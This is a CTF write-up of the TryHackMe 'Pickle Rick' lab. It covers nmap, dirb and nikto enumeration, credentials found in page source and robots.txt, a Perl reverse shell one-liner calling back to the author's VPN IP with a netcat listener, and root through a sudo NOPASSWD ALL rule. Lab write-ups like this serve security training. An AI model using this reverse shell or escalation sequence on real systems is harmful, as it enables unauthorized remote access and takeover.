Pickle Rick - TryHackMe !

-
rick

Enumeration

Nmap scan result

# Nmap 7.91 scan initiated Thu May 27 08:23:53 2021 as: nmap -sV -sC -oN nmap/pickle_rick 10.10.11.26
Nmap scan report for 10.10.11.26
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f7:72:fe:b9:a6:8a:40:99:46:b0:ff:34:50:7a:de:4e (RSA)
|   256 0b:0e:f8:1e:d5:aa:89:96:d5:4a:96:de:bd:83:3a:b6 (ECDSA)
|_  256 c2:9a:86:0e:c8:d8:27:6d:c1:b5:40:99:ce:47:92:7a (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 27 08:24:37 2021 -- 1 IP address (1 host up) scanned in 43.28 seconds

Here we found we have port 80 open. when You go into the port 80 you can see the web page.

Dirb scan result

┌─[][visith@parrot][~/CTF/thm/pickle_rick/nmap]
└──╼ $dirb http://10.10.11.26/  

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May 27 09:27:19 2021
URL_BASE: http://10.10.11.26/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.11.26/ ----
==> DIRECTORY: http://10.10.11.26/assets/                                                    
+ http://10.10.11.26/index.html (CODE:200|SIZE:1062)                                         
+ http://10.10.11.26/robots.txt (CODE:200|SIZE:17)                                           
+ http://10.10.11.26/server-status (CODE:403|SIZE:299)

/assets not much useful
/robots.txt some text assuming some kind of password.
/Server-status was forbidden.

Nikto scan result

For double sure I ran a nikto scan.

┌─[][visith@parrot][~/CTF/thm/pickle_rick]
└──╼ $nikto -h http://10.10.11.26/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.11.26
+ Target Hostname:    10.10.11.26
+ Target Port:        80
+ Start Time:         2021-05-27 09:03:20 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7893 requests: 1 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-05-27 09:09:16 (GMT5.5) (2156 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Here we found /login.php . I look into the source code anything suspicious stuff there. I found a username in there. so we have a password and username now.

Credentials for www-data

http://10.10.11.26:80 -> page source for username
http://10.10.11.26/robots.txt -> password
Found username and password - R1ckRul3s:Wubbalubbadubdub

We have a shell now we can try some commands.



we found our first ingredients but we can’t ‘cat’ the output. So I was thinking about reverse shell.

Reverse shell

After messing around a bit and trying to get a reverse shell, i finally managed to get it by using pentest monkey reverse shell cheat sheet. It was a perl reverse connection. This is the shell, modify it to fit your IP and port (use your tryhackme vpn IP)

This was my PERl reverse shell. I set a netcat for 9001.

perl -e 'use Socket;$i="10.9.0.173";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

we got the shell.Now we can use ‘cat’ command.

┌─[][visith@parrot][~/CTF/thm/pickle_rick]
└──╼ $nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.9.0.173] from (UNKNOWN) [10.10.11.26] 52402
/bin/sh: 0: can't access tty; job control turned off
$ ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
$ whoami
www-data
$ cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair
$ cat clue.txt
Look around the file system for the other ingredient.

In the clue.txt they mention about file system. Now we in the /var/www/html. when we go to the /home we can find the second one.

$ cd home
$ ls
rick
ubuntu
$ pwd
/home
$ ls
rick
ubuntu
$ cd rick
$ ls
second ingredients
$ cat 'second ingredients'
1 jerry tear
$

Lets see if we are able to use ls and get into the /root directory. It seems that we are not able to view anything in from the /root .I wonder if we are able to use sudo to elevated our user prevlages.

$ sudo -l
Matching Defaults entries for www-data on
    ip-10-10-11-26.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-11-26.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

Yeah my guess was correct. we can get the prevlages.

$ sudo su
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/home/rick
cd ../..
pwd
/
cd root
ls
3rd.txt
snap
cat 3rd.txt
3rd ingredients: fleeb juice

Popular posts from this blog

Mustacchio - TryHackMe

-
Image
thm What we can learn from this machine : XXE injection Enumerations SUID exploit let’s start with a nmap scan. normal nmap scan found port 80 webserver called Mustacchio and port 22 ssh open running ubuntu. I try to running a full nmap scan for see more ports are open above the port 1000. # Nmap 7.91 scan initiated Sat Jun 12 14:57:25 2021 as: nmap -sC -sV -p- -oN scans/nmap-allports 10.10.236.36 Nmap scan report for 10.10.236.36 Host is up (0.15s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA) | 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA) |_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-t
Read more

Tech_Supp0rt: 1 - TryHackMe

-
Image
Welcome file Welcome to another CTF-writeup !! Tech_support:1 by vikaran. What we can learn from this machine. nmap scan , smbmap etc. (enumeration skills) subrion cms 4.2.1 RCE iconv sudo permission to overwritten files and read the files Let’s start with enumeration. First with nmap to see what port we have in the box. Nmap scan ┌── ( defalt@kali ) - [ ~/Documents/tryhackme/Tech_Supp0rt:1 ] └─$ nmap -sC -sV 10.10.168.200 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-15 21:29 PDT Nmap scan report for 10.10.168.20 Host is up ( 0.37s latency ) . Not shown: 996 closed tcp ports ( conn-refused ) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 ( Ubuntu Linux ; protocol 2.0 ) | ssh-hostkey: | 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 ( RSA ) | 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c ( ECDSA ) | _ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c ( ED25519 ) 80/tcp open http Apache ht
Read more

Juicy Details - TryHackMe

-
Image
thm What we can learn from this machine? How to read and understand the firefox log files About sql injection Reconnaissance What tools did the attacker use? (Order by the occurrence in the log) : : ffff : 192.168 . 10.5 - - [ 11 / Apr / 2021 : 09 : 08 : 34 + 0000 ] "POST / HTTP/1.1" 200 1924 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" : : ffff : 192.168 . 10.5 - - [ 11 / Apr / 2021 : 09 : 16 : 29 + 0000 ] "POST /rest/user/login HTTP/1.0" 401 26 "-" "Mozilla/5.0 (Hydra)" : : ffff : 192.168 . 10.5 - - [ 11 / Apr / 2021 : 09 : 29 : 14 + 0000 ] "GET /rest/products/search?q=1 HTTP/1.1" 200 - "-" "sqlmap/1.5.2#stable (http://sqlmap.org)" : : ffff : 192.168 . 10.5 - - [ 11 / Apr / 2021 : 09 : 32 : 51 + 0000 ] "GET /rest/products/search?q=qwert%27))%20UNION%20SELECT%20id,%20email,%20passwor
Read more